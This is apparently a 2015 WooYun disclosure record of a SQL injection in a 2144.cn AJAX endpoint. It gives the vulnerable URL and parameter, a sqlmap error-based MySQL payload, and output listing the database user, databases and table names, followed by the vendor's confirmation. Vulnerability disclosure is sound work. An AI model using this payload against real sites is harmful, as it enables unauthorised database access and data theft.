当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125578

漏洞标题:2144玩主站某接口存在SQL注射

相关厂商:2144.cn

漏洞作者: 路人甲

提交时间:2015-07-09 11:00

修复时间:2015-08-23 11:08

公开时间:2015-08-23 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

欢迎入住乌云!

详细说明:

http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=1&t=0.09775325423106551
参数pageSize

漏洞证明:

---
Parameter: pageSize (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: byMonth=0&cid=1&page=1&pageSize=1 PROCEDURE ANALYSE(EXTRACTVALUE(2485,CONCAT(0x5c,0x71787a6271,(SELECT (CASE WHEN (2485=2485) THEN 1 ELSE 0 END)),0x717a717071)),1)&t=0.09775325423106551
---
back-end DBMS: MySQL 5.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pageSize (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: byMonth=0&cid=1&page=1&pageSize=1 PROCEDURE ANALYSE(EXTRACTVALUE(2485,CONCAT(0x5c,0x71787a6271,(SELECT (CASE WHEN (2485=2485) THEN 1 ELSE 0 END)),0x717a717071)),1)&t=0.09775325423106551
---
back-end DBMS: MySQL 5.1
current user: 'app_2144_cn@10.10.16.%'
current user is DBA: False
available databases [3]:
[*] app_2144_cn
[*] information_schema
[*] test
Database: app_2144_cn
[61 tables]
+-------------------+
| c_user |
| c_vote_log |
| c_vote_log_0 |
| c_vote_log_1 |
| c_vote_log_10 |
| c_vote_log_11 |
| c_vote_log_12 |
| c_vote_log_13 |
| c_vote_log_14 |
| c_vote_log_15 |
| c_vote_log_2 |
| c_vote_log_3 |
| c_vote_log_4 |
| c_vote_log_5 |
| c_vote_log_6 |
| c_vote_log_7 |
| c_vote_log_8 |
| c_vote_log_9 |
| c_vote_options |
| c_vote_question |
| feedback |
| flash_flash |
| flash_girl |
| flash_girls_new |
| girls_nav |
| keyword |
| keywordview |
| link_category |
| link_element |
| migration |
| t_admin |
| t_category |
| t_comment |
| t_comment_0 |
| t_comment_1 |
| t_comment_2 |
| t_comment_3 |
| t_comment_4 |
| t_comment_5 |
| t_comment_6 |
| t_comment_7 |
| t_comment_8 |
| t_comment_9 |
| t_comment_a |
| t_comment_b |
| t_comment_c |
| t_comment_d |
| t_comment_e |
| t_comment_f |
| t_comment_new |
| t_comment_newbk |
| t_comment_operate |
| t_flower_switch |
| t_log |
| t_operate |
| t_photo |
| t_photo_cache |
| t_photo_cache_bak |
| t_photo_girl |
| t_session |
| t_stat |
+-------------------+

修复方案:

这接口要不要设置下访问权限呢?

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-09 11:07

厂商回复:

非常感谢您对2144游戏网安全工作的支持!

最新状态:

暂无


漏洞评价:

评论